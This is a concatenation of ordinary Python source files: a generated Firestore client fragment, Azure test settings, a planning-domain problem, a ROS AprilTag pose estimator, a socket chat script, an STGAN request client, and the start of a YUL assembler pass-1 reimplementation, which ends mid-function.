metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.PartitionQueryPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def write(
self,
requests: Iterator[firestore.WriteRequest] = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> Iterable[firestore.WriteResponse]:
r"""Streams batches of document updates and deletes, in
order.
Args:
requests (Iterator[google.cloud.firestore_v1.types.WriteRequest]):
The request object iterator. The request for
[Firestore.Write][google.firestore.v1.Firestore.Write].
The first request creates a stream, or resumes an
existing one from a token.
When creating a new stream, the server replies with a
response containing only an ID and a token, to use in
the next request.
When resuming a stream, the server first streams any
responses later than the given token, then a response
containing only an up-to-date token, to use in the next
request.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
Iterable[google.cloud.firestore_v1.types.WriteResponse]:
The response for
[Firestore.Write][google.firestore.v1.Firestore.Write].
"""
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.write]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (gapic_v1.routing_header.to_grpc_metadata(()),)
# Send the request.
response = rpc(requests, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def listen(
self,
requests: Iterator[firestore.ListenRequest] = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> Iterable[firestore.ListenResponse]:
r"""Listens to changes.
Args:
requests (Iterator[google.cloud.firestore_v1.types.ListenRequest]):
The request object iterator. A request for
[Firestore.Listen][google.firestore.v1.Firestore.Listen]
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
Iterable[google.cloud.firestore_v1.types.ListenResponse]:
The response for
[Firestore.Listen][google.firestore.v1.Firestore.Listen].
"""
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.listen]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (gapic_v1.routing_header.to_grpc_metadata(()),)
# Send the request.
response = rpc(requests, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def list_collection_ids(
self,
request: firestore.ListCollectionIdsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListCollectionIdsPager:
r"""Lists all the collection IDs underneath a document.
Args:
request (google.cloud.firestore_v1.types.ListCollectionIdsRequest):
The request object. The request for
[Firestore.ListCollectionIds][google.firestore.v1.Firestore.ListCollectionIds].
parent (str):
Required. The parent document. In the format:
``projects/{project_id}/databases/{database_id}/documents/{document_path}``.
For example:
``projects/my-project/databases/my-database/documents/chatrooms/my-chatroom``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.services.firestore.pagers.ListCollectionIdsPager:
The response from
[Firestore.ListCollectionIds][google.firestore.v1.Firestore.ListCollectionIds].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a firestore.ListCollectionIdsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.ListCollectionIdsRequest):
request = firestore.ListCollectionIdsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_collection_ids]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListCollectionIdsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def batch_write(
self,
request: firestore.BatchWriteRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> firestore.BatchWriteResponse:
r"""Applies a batch of write operations.
The BatchWrite method does not apply the write operations
atomically and can apply them out of order. Method does not
allow more than one write per document. Each write succeeds or
fails independently. See the
[BatchWriteResponse][google.firestore.v1.BatchWriteResponse] for
the success status of each write.
If you require an atomically applied set of writes, use
[Commit][google.firestore.v1.Firestore.Commit] instead.
Args:
request (google.cloud.firestore_v1.types.BatchWriteRequest):
The request object. The request for
[Firestore.BatchWrite][google.firestore.v1.Firestore.BatchWrite].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.types.BatchWriteResponse:
The response from
[Firestore.BatchWrite][google.firestore.v1.Firestore.BatchWrite].
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.BatchWriteRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.BatchWriteRequest):
request = firestore.BatchWriteRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.batch_write]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("database", request.database),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def create_document(
self,
request: firestore.CreateDocumentRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> document.Document:
r"""Creates a new document.
Args:
request (google.cloud.firestore_v1.types.CreateDocumentRequest):
The request object. The request for
[Firestore.CreateDocument][google.firestore.v1.Firestore.CreateDocument].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.firestore_v1.types.Document:
A Firestore document.
Must not exceed 1 MiB - 4 bytes.
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a firestore.CreateDocumentRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, firestore.CreateDocumentRequest):
request = firestore.CreateDocumentRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_document]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-cloud-firestore",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("FirestoreClient",)
|
the-stack_0_25982
|
import pytz
import os
import logging.config
from dotenv import load_dotenv
from ..utils import env
from datetime import datetime
HOME_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
dot_env = os.path.join(HOME_DIR, ".env")
load_dotenv(dotenv_path=dot_env)
DEBUG = env("DEBUG",False)
TIME_ZONE = env("TIME_ZONE",'Australia/Perth')
TZ = datetime.now(tz=pytz.timezone(TIME_ZONE)).tzinfo
AZURE_CONNECTION_STRING = env("TEST_STORAGE_CONNECTION_STRING",vtype=str,required=True)
AZURE_CONTAINER = env("TEST_CONTAINER",vtype=str,required=True)
RESOURCE_NAME = env("TEST_RESOURCE_NAME",vtype=str,required=True)
LOCAL_STORAGE_ROOT_FOLDER = env("TEST_STORAGE_ROOT_FOLDER",vtype=str,required=True)
logging.basicConfig(level="WARNING")
LOG_CONFIG = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
#'console': {'format': '%(asctime)s %(levelname)-8s %(name)-15s %(message)s'},
'console': {'format': '%(asctime)s %(levelname)-8s %(message)s'},
},
'handlers': {
'console': {
'level': 'DEBUG' if DEBUG else 'INFO',
'class': 'logging.StreamHandler',
'formatter': 'console'
},
},
'loggers': {
'data_storage': {
'handlers': ['console'],
'level': 'DEBUG' if DEBUG else 'INFO',
'propagate':False
},
},
'root':{
'handlers': ['console'],
'level': 'WARNING',
'propagate':False
}
}
logging.config.dictConfig(LOG_CONFIG)
|
the-stack_0_25985
|
__author__ = 'patras'
from domain_exploreEnv import *
from timer import DURATION
from state import state, rv
DURATION.TIME = {
'survey': 5,
'monitor': 5,
'screen': 5,
'sample': 5,
'process': 5,
'fly': 3,
'deposit': 1,
'transferData': 1,
'take': 2,
'put': 2,
'move': 10,
'charge': 5,
'negotiate': 5,
'handleAlien': 5,
}
DURATION.COUNTER = {
'survey': 5,
'monitor': 5,
'screen': 5,
'sample': 5,
'process': 5,
'fly': 3,
'deposit': 1,
'transferData': 1,
'take': 2,
'put': 2,
'move': 10,
'charge': 5,
'negotiate': 5,
'handleAlien': 5,
}
rv.TYPE = {'e1': 'survey', 'e2': 'monitor', 'e3': 'screen', 'e4': 'sample', 'e5':'process'}
rv.EQUIPMENT = {'survey': 'e1', 'monitor': 'e2', 'screen': 'e3', 'sample': 'e4', 'process': 'e5'}
rv.EQUIPMENTTYPE = {'e1': 'survey', 'e2': 'monitor', 'e3': 'screen', 'e4': 'sample', 'e5':'process'}
rv.LOCATIONS = ['base', 'z1', 'z2', 'z3', 'z4']
rv.EDGES = {'base': {'z1': 20, 'z2': 50, 'z3': 20, 'z4': 50}, 'z1': {'base': 20, 'z2': 30, 'z4': 50}, 'z2': {'base': 50, 'z1': 30, 'z3': 30}, 'z3': {'base': 20, 'z2': 30, 'z4': 30}, 'z4': {'base': 50, 'z3': 30, 'z1': 50}}
def ResetState():
state.loc = {'r1': 'base', 'r2': 'base', 'UAV': 'base'}
state.charge = { 'UAV': 50, 'r1': 80, 'r2': 50}
state.data = { 'UAV': 1, 'r1': 3, 'r2': 3}
state.pos = {'c1': 'base', 'e1': 'base', 'e2': 'base', 'e3': 'base', 'e4': 'base', 'e5': 'base'}
state.load = {'r1': NIL, 'r2': NIL, 'UAV': NIL}
state.storm = {'active': True}
tasks = {
2: [['doActivities', 'UAV', [['survey', 'z4'], ['survey', 'base'], ['survey', 'z1']]]],
4: [['handleEmergency', 'r2', 'z2']],
}
eventsEnv = {
4: [alienSpotted, ['z2']]
}
|
the-stack_0_25986
|
#!/usr/bin/env python
import rospy
import numpy
from apriltag_ros.msg import AprilTagDetectionArray
from geometry_msgs.msg import PoseWithCovarianceStamped
import tf
rospy.init_node('yeetbot_absolute_pose_estimation')
tf_listener = tf.TransformListener()
def tag_detection_cb(tag_array):
global pub
# Transform from the map frame to the camera frame
try:
(cam_trans, cam_rot) = tf_listener.lookupTransform(
'map', tag_array.header.frame_id, rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException,
tf.ExtrapolationException):
rospy.logwarn("Failed to transform frame '" + tag_array.header.frame_id + "'... Discarding whole message!")
return
T = tf.transformations.translation_matrix(cam_trans)
R = tf.transformations.quaternion_matrix(cam_rot)
# From map to camera
m_T_c = tf.transformations.concatenate_matrices(T, R)
for det in tag_array.detections:
tag_frame = 'tag' + str(det.id[0])
# Get the transform from the tag frame to the base_link frame
try:
(trans, rot) = tf_listener.lookupTransform(
tag_frame, 'base_link', rospy.Time(0))
except (tf.LookupException, tf.ConnectivityException,
tf.ExtrapolationException) as e:
rospy.logwarn("Failed to transform frame '" + tag_frame + "'... Discarding data.")
rospy.logerr(e)
continue
T = tf.transformations.translation_matrix(trans)
R = tf.transformations.quaternion_matrix(rot)
# From tag to base link
t_T_b = tf.transformations.concatenate_matrices(T, R)
trans = [det.pose.pose.pose.position.x,
det.pose.pose.pose.position.y,
det.pose.pose.pose.position.z]
rot = [det.pose.pose.pose.orientation.x,
det.pose.pose.pose.orientation.y,
det.pose.pose.pose.orientation.z,
det.pose.pose.pose.orientation.w]
T = tf.transformations.translation_matrix(trans)
R = tf.transformations.quaternion_matrix(rot)
c_T_t = tf.transformations.concatenate_matrices(T, R)
# We now have the transform from the tag frame to the base link
# frame, the transform from the camera frame to the map frame, and
# the pose of the tag in the camera frame
# Multiplying these together should give the correct transform
c_T_b = numpy.dot(c_T_t, t_T_b)
m_T_b = numpy.dot(m_T_c, c_T_b)
trans = tf.transformations.translation_from_matrix(m_T_b)
rot = tf.transformations.quaternion_from_matrix(m_T_b)
pose = PoseWithCovarianceStamped()
pose.pose.pose.position.x = trans[0]
pose.pose.pose.position.y = trans[1]
pose.pose.pose.position.z = trans[2]
pose.pose.pose.orientation.x = rot[0]
pose.pose.pose.orientation.y = rot[1]
pose.pose.pose.orientation.z = rot[2]
pose.pose.pose.orientation.w = rot[3]
z_dist = det.pose.pose.pose.position.z
cov = 3e-2 + z_dist * 3e-3
pose.pose.covariance = [cov , 0, 0, 0, 0, 0,
0 , cov , 0, 0, 0, 0,
0 , 0, cov , 0, 0, 0,
0 , 0, 0, 0, 0, 0,
0 , 0, 0, 0, 0, 0,
0 , 0, 0, 0, 0, 1e-1]
pose.header.stamp = tag_array.header.stamp
pose.header.frame_id = 'map'
if pose.pose.pose.position.z > 0.1 or pose.pose.pose.position.z < -0.1:
return
pub.publish(pose)
def main():
global pub
pub = rospy.Publisher(
"yeetbot_pose_estimate", PoseWithCovarianceStamped, queue_size=20)
rospy.Subscriber(
'tag_detections', AprilTagDetectionArray, tag_detection_cb)
rospy.spin()
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException:
pass
|
the-stack_0_25988
|
import socket
import threading
ENCODING = 'utf-8'
#simple messenger has two components, a sender and a receiver.
#These two components should run on separated threads
#To implement them we will have two classes: Receiver and Sender. Both of them will extend threading.Thread
#The receiver is the one responsible of receiving messages. It will be a component which binds a server socket to listen to connections and receive the data the client is sending.
class Receiver(threading.Thread):
def __init__(self, my_host, my_port):
threading.Thread.__init__(self, name="messenger_receiver")
self.host = my_host
self.port = my_port
def listen(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Create a new socket using the AF_INET address family, and SOCK_STREAM socket type
sock.bind((self.host, self.port))
sock.listen(10)
while True:
connection, client_address = sock.accept()
try:
full_message = ""
while True:
data = connection.recv(16)
full_message = full_message + data.decode(ENCODING)
if not data:
print("{}: {}".format(client_address, full_message.strip()))
break
finally:
#connection.shutdown(2)
connection.close()
def run(self):
self.listen()
#The sender is the one responsible of sending messages. In most cases, it’s a component which, every time the user wants to send a message, opens a client socket, connects it to the recipient of the message, actually sends the message and then closes the socket.
class Sender(threading.Thread):
def __init__(self, my_friends_host, my_friends_port):
threading.Thread.__init__(self, name="messenger_sender")
self.host = my_friends_host
self.port = my_friends_port
def run(self):
while True:
message = input("=>") #collect message from terminal input
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.host, self.port)) #sender socket connects rather than binds and listen
s.sendall(message.encode(ENCODING))
s.shutdown(2)
s.close()
def main():
my_host = input("which is my host? ")
my_port = int(input("which is my port? "))
receiver = Receiver(my_host, my_port)
my_friends_host = input("what is your friend's host? ")
my_friends_port = int(input("what is your friend's port? "))
sender = Sender(my_friends_host, my_friends_port)
threads = [receiver.start(), sender.start()]
if __name__ == '__main__':
main()
|
the-stack_0_25991
|
# coding: utf8
import requests
import json
import base64
import os
if __name__ == "__main__":
# 指定要使用的图片文件并生成列表[("image", img_1), ("image", img_2), ... ]
file_list = ["../../../../docs/imgs/man.png"]
files = [("image", (open(item, "rb"))) for item in file_list]
# 为每张图片对应指定info和style
data = {"info": ["Male,Black_Hair"], "style": ["Bald"]}
# 指定图片生成方法为stgan_celeba并发送post请求
url = "http://127.0.0.1:8866/predict/image/stgan_celeba"
r = requests.post(url=url, data=data, files=files)
print(r.text)
results = eval(r.json()["results"])
# 保存生成的图片到output文件夹,打印模型输出结果
if not os.path.exists("stgan_output"):
os.mkdir("stgan_output")
for item in results:
output_path = os.path.join("stgan_output", item["path"].split("/")[-1])
with open(output_path, "wb") as fp:
fp.write(base64.b64decode(item["base64"].split(',')[-1]))
item.pop("base64")
print(json.dumps(results, indent=4, ensure_ascii=False))
|
the-stack_0_25996
|
import copy
from yul_system.types import Bit, SwitchBit, FieldCodBit, HealthBit, LocStateBit, \
MemType, Symbol, ALPHABET, ONES
class POPO:
def __init__(self, health=0, card=''):
self.health = health
self.card = card
vert_format = ord(self.card[7])
if vert_format >= 0x50:
vert_format -= 0x20
self.seq_break = True
else:
self.seq_break = False
if vert_format >= 0x40:
self.marked = True
else:
self.marked = False
def mark(self):
if not self.marked:
vert_format = ord(self.card[7])
self.card = self.card[:7] + chr(vert_format + 0x10) + self.card[8:]
self.marked = True
def unmark(self):
if self.marked:
vert_format = ord(self.card[7])
self.card = self.card[:7] + chr(vert_format - 0x10) + self.card[8:]
self.marked = False
def set_seq_break(self):
if not self.seq_break:
vert_format = ord(self.card[7])
self.card = self.card[:7] + chr(vert_format + 0x20) + self.card[8:]
self.seq_break = True
def clear_seq_break(self):
if self.seq_break:
vert_format = ord(self.card[7])
self.card = self.card[:7] + chr(vert_format - 0x20) + self.card[8:]
self.seq_break = False
def cardno_wd(self):
return self.card[0:8]
def loc_field(self):
return self.card[8:16]
def op_field(self):
return self.card[16:24]
def address_1(self):
return self.card[24:32]
def address_2(self):
return self.card[32:40]
def date_word(self):
return self.card[64:72]
class BadMemory(Exception):
pass
class IllegalOp(Exception):
pass
class Disaster(Exception):
pass
class BadMerge(Exception):
pass
class Pass1:
def __init__(self, mon, yul):
self._mon = mon
self._yul = yul
self._real_cdno = 0
self._last_cdno = 0
self._field_cod = [None, None]
self._end_of = POPO(health=0, card='⌑999999Q' + '%-72s' % yul.old_line)
self._early = True
self._op_found = None
self._send_endo = False
self._renum_disabled = False
self._restart_log = False
self._log_renum = False
self._loc_state = 0
self._renumber = 0
self._sypt = None
self._head = ' '
self._end_yul = 'END YUL PASS 1'
self._xforms = [
0x4689A5318F,
0x47BCDF42E2,
0x47BCDF42E2,
0xB7BCD642B4,
0xB7BCD742B4,
0x07BCDF62FF,
0x37BCDF42B7,
0x37BCDF42B7,
0x1BBEEFB2BB,
0x3CECEFC2EC,
0x3DEEDFD2ED,
0x1BBEEFB2BB,
0x3CECEFC2EC,
0x3DEEDFD2ED,
0x1EEEEFE2EE,
0x1FFFFFF2FF,
]
def post_spec(self):
if self._yul.switch & SwitchBit.SUBROUTINE:
self._loc_ctr = self.subr_loc
else:
self._loc_ctr = ONES
return self.get_real()
def get_real(self):
# Get real is normally the chief node of pass 1. Occasionally merge control procedures take
# over, accepting or rejecting tape cards.
try:
while True:
# Get a card and branch on no end of file.
card = self.get_card()
if card is None:
self._real = self._end_of
return self.tp_runout()
if self._yul.switch & SwitchBit.MERGE_MODE:
if not self._yul.switch & SwitchBit.TAPE_KEPT:
self._tape = self.get_tape()
if self._tape is None:
# FIXME: Clean up and exit pass 1
return
self.modif_chk()
except BadMerge:
return self.bad_merge()
def tp_runout(self):
if not self._yul.switch & SwitchBit.MERGE_MODE:
self.proc_real()
if self._yul.switch & SwitchBit.TAPE_KEPT:
self.proc_tape()
self._tape = self.get_tape()
while self._tape is not None:
self.proc_tape()
self._tape = self.get_tape()
return self.end_pass_1()
def end_pass_1(self):
if self._yul.popos[-1].health != 0:
print(self._yul.popos[-1].card)
raise Disaster()
if self._yul.switch & SwitchBit.FREEZE_P1:
self.send_popo(self._end_of)
# FIXME: play with number of copies?
bad1_bits = (SwitchBit.REPRINT |
SwitchBit.SUPPRESS_INACTIVE | SwitchBit.SUPPRESS_SYMBOL | SwitchBit.SUPPRESS_OCTAL |
SwitchBit.CONDISH_INACTIVE | SwitchBit.CONDISH_SYMBOL | SwitchBit.CONDISH_OCTAL)
# Maybe set reprint flag for passes 1.5, 3.
self._yul.switch &= ~SwitchBit.REPRINT_PASS1P5
if self._yul.switch & SwitchBit.REPRINT:
self._yul.switch |= SwitchBit.REPRINT_PASS1P5
# Branch on no merge error.
if self._end_yul.endswith('≠'):
# Bar YULPROGS writes, bar some printing.
self._yul.switch |= bad1_bits
self._mon.mon_typer(self._end_yul)
# Clear out substrand (paragraph) table
self._yul.substrab = [False]*256
# FIXME: do segment things
comp_pass2 = self._mon.phi_load(self._yul.comp_name + '.PASS2', self._yul, self.adr_limit, self.m_typ_tab)
if comp_pass2 is None:
self._yul.typ_abort()
return comp_pass2.pass_1p5()
def get_card(self):
# Subroutine in pass 1 to get a real card. Normally performs card number checking. Response
# to Yul director or monitor card (end of file situations) is to peek only.
# Peek at card.
card = self._mon.mon_peek()
# Branch if not any kind of end of file.
if card[0] in 'Y*':
if card[0] == 'Y':
# Show that another task follows.
self._yul.switch |= SwitchBit.ANOTHER_TASK
# End of file exit after peek at mon card.
self._real_cdno = Bit.BIT6
return None
# See no input if reprinting.
if self._yul.switch & SwitchBit.REPRINT:
return None
card = self._mon.mon_read()
self._real = POPO(health=0, card=card)
if self._real.card[7] == ' ':
# Insert upspace 1 for blank.
self._real.card = self._real.card[:7] + '1' + self._real.card[8:]
elif self._real.card[7] == '-':
# Assume minus is a fat-fingering of 2.
self._real.card = self._real.card[:7] + '2' + self._real.card[8:]
elif not self._real.card[7].isnumeric():
# Insert form-skip for non-numeric.
self._real.card = self._real.card[:7] + '8' + self._real.card[8:]
# Mark all cards entering during merging.
if self._yul.switch & SwitchBit.MERGE_MODE:
self._real.mark()
# Blot out undesirable column 1 contents.
if not (self._real.card[0].isalnum() or self._real.card[0] in '= '):
self._real.card = '■' + self._real.card[1:]
self._real.health = 0
# Card number sequence checking and sequence break analysis.
# Isolate card no. for seq. brk. analysis.
card_no = self._real.card[1:7]
# Substitute zero for blank.
card_no = card_no.replace(' ', '0')
seq_break = False
test_col1 = True
if not card_no.isnumeric():
# "SEQBRK" is only non-numeric allowed.
if card_no == 'SEQBRK':
seq_break = True
# Allow for "LOG" in col 2-7 of acceptor.
elif self._real.card[0] == '=':
seq_break = True
# Show illegal number field by zero.
else:
card_no = '000000'
# Card number 999999 is a sequence break.
if card_no == '999999':
seq_break = True
# Do not test column 1 of right print.
if self._real.card[7] != '9':
# A log card is an automatic sequence break.
if self._real.card[0] == 'L':
# FIXME: Remove confusing info from log card?
# self._real.card = self._real.card[0] + ' ' + self._real.card[7:]
seq_break = True
# Branch if not TINS (Tuck In New Section)... which is an incipient log card.
if self._real.card[0] == 'T':
seq_break = True
# Op code "MODIFY" is automatic seq. brk.
if self._real.card[0] == ' ' and self._real.card[16:22] == 'MODIFY':
seq_break = True
if seq_break:
# Insert sequence break bit in card.
self._real.set_seq_break()
# Set up criterion after sequence break.
self._real_cdno = Bit.BIT6
return self._real.card
real_card_no = int(card_no, 10)
if real_card_no <= (self._real_cdno & 0xFFFFFFFFF):
# Disorder
self._real.health |= Bit.BIT7
# Keep normal form of card number on tape.
self._real.card = self._real.card[0] + card_no + self._real.card[7:]
self._real_cdno = real_card_no
return self._real.card
def send_popo(self, popo):
if self._renum_disabled:
# Restore renumbering test to normal.
self._renum_disabled = False
return self.move_popo(popo)
# Branch if renumbering is on.
if not (self._yul.switch & SwitchBit.RENUMBER):
return self.move_popo(popo)
# Go to renumber most card types.
card_type = popo.health & HealthBit.CARD_TYPE_MASK
if card_type >= HealthBit.CARD_TYPE_RIGHTP:
return self.rnum_card(popo)
# Br if merge control or merge error card.
if card_type != HealthBit.CARD_TYPE_REMARK:
# Branch if merge control card.
if HealthBit.CARD_TYPE_CARDNO > card_type:
# Shut off renumbering on bad merge.
self._yul.switch &= ~SwitchBit.RENUMBER
return self.move_popo(popo)
# Branch to renumber non-log remarks.
if popo.card[0] != 'L':
return self.rnum_card(popo)
# Restart number sequence after log etc.
self._field_cod[1] = 0
self._renumber = 0
if self._restart_log:
self._yul.switch &= ~SwitchBit.RENUMBER
return self.move_popo(popo)
def rnum_card(self, popo):
# Wipe out obsolete sequence error bit.
popo.health &= ~Bit.BIT7
if self._renumber > 999898:
# Generate seqbreak after card 9998.98.
popo.set_seq_break()
popo.card = popo.card[0] + 'SEQBRK' + popo.card[7:]
self._renumber = 0
self._field_cod[1] = 0
return self.move_popo(popo)
self._renumber += 100
# Erase old sequence break flag.
popo.clear_seq_break()
# Plant it and go to move card.
self._field_cod[1] = self._renumber
popo.card = popo.card[0] + ('%06d' % self._renumber) + popo.card[7:]
return self.move_popo(popo)
def move_popo(self, popo):
self._yul.popos.append(popo)
def modif_chk(self):
# See if operation code of real card is "MODIFY". But don't be fooled by a remarks card.
if self._real.card[1:6] == 'MODIFY' and self._real.card[0] == ' ' and (ord(self._real.card[7]) & 0xF) != 9:
# Indicate card type.
self._real.health |= HealthBit.CARD_TYPE_MODIFY
if not self._yul.switch & SwitchBit.MERGE_MODE:
# When in main part of new program send the "MODIFY" card, create and send the
# "END OF" card made up by pass 0, and process the latter.
self.proc_real()
self._real = self._end_of
self.proc_real()
return
# Set up search for "END OF" card.
while self._tape.card[:8] != self._end_of[:8]:
self.proc_tape()
# Get another tape card if not found yet.
self._tape = self.get_tape()
if self._tape is None:
raise Disaster()
# Process "MODIFY" just before "END OF".
self.proc_real()
return self.proc_tape()
if not self._yul.switch & SwitchBit.MERGE_MODE:
# Process real card with no further ado.
return self.proc_real()
return self.comp_cdns()
def comp_cdns(self):
# COMP CDNS is the heart of the merging process. If the tape card is chosen,
# it cannot be an "END OF" card.
while True:
if self._real_cdno <= self._tape_cdno:
break
# Since the last card of a tape file is numered 999999, we guarantee no EOF.
self.proc_tape()
self._tape = self.get_tape()
return self.keep_tape()
def keep_tape(self):
# Indicate that a tape card is waiting.
self._yul.switch |= SwitchBit.TAPE_KEPT
# Right print can't be merge control card.
if (ord(self._real.card[7]) & 0xF) == 9:
return self.not_mccd()
# Branch if not an acceptor card.
if self._real.card[0] != '=':
return self.not_acept()
# Reject if disordered card number.
self._real.health |= HealthBit.CARD_TYPE_ACCEPT
if (self._real.health >> 36) & 0o77:
raise BadMerge()
# Analyze card number field.
common, value = self.anal_subf(self._real.cardno_wd()[1:7], self._real)
common = common.strip()
# Disable complaint about "D" error.
self._real.health &= ~Bit.BIT9
# Branch if not accepting a log card.
merj_rtrn = False
if common == "LOG":
# Branch if dashes should be put in date.
if self._real.card[67:69] != ' ' or self._real.card[70:72] != ' ':
self._real.card = self._real.card[:69] + '-' + self._real.card[70:72] + '-' + self._real.card[73:]
merj_rtrn = True
while True:
# Illegal to accept an "END OF" card thus.
if self._tape.cardno_wd() == self._end_of.cardno_wd():
raise BadMerge()
if ((self._tape_cdno != self._real_cdno) or # Demand equality of formal card number.
(merj_rtrn and self._tape.card[0] != 'L') or # Branch if tape card should be log.
(self._tape.card[8:] != self._real.card[8:]) or # Branch if difference in cols. 9-80.
(self._tape.card[0] == 'L' and not merj_rtrn)): # Branch if log but should not be.
# Accept a card and get another.
self.proc_tape()
self._tape = self.get_tape()
continue
break
# Mark card as accepted.
self._tape.mark()
# Send acceptor card.
self.send_popo(self._real)
# Process accepted card, get another real.
self.proc_tape()
# Procedure to detect and process requests for changing or correcting card numbers, using the "CARDNO" code. The
# "CARDNS" code is similar, but starts renumbering from that value until the next log card. "PRESERVE CDNS"
# turns off renumbering. If "RENUMBER" subdirector was used, it resumes after the reign of any "CARDNS" code.
def not_acept(self):
# Branch if cannot be merge control card.
if self._real.card[0] != ' ':
return self.not_mccd()
# Branch if not a "CARDNS" code.
if self._real.card[17:23] != 'CARDNS':
return self.cardno_cq()
if self._real.loc_field() != 'PRESERVE':
return self.cardno_cq(cardns=True)
self._real.health |= HealthBit.CARD_TYPE_CARDNO
if (not self._real.address_1().isspace()) or (not self._real.address_1().isspace()):
# Cuss bad address field.
self._real.health |= Bit.BIT9
raise BadMerge()
# Reject "PRESERVE CARDNS" for any defect.
if self._real.health & ~HealthBit.CARD_TYPE_MASK:
raise BadMerge()
self.find_cdno()
# Exit quietly if renumbering already off.
if self._yul.switch <= Bit.BIT1:
self.send_popo(self._real)
return self.proc_tape()
# Branch if preservation causes disorder.
if self._real_cdno <= self._field_cod[1]:
self._real.health |= Bit.BIT7
raise BadMerge()
self._yul.switch &= ~SwitchBit.RENUMBER
# Exit if renumbering was in log sec only.
if not self._restart_log:
# Modify log card routine to start renum.
self._log_renum = True
self.send_popo(self._real)
return self.proc_tape()
def cardno_cq(self, cardns=False):
# Branch if not a "CARDNO" code.
if (not cardns) and (self._real.card[17:23] != 'CARDNO'):
return self.delete_cq()
# Analyze location field.
common, value = self.anal_subf(self._real.loc_field(), self._real)
common = common.strip()
if common == 'CORRECT':
# Set up search for bad card number if "CORRECT" but never cuss this card no.
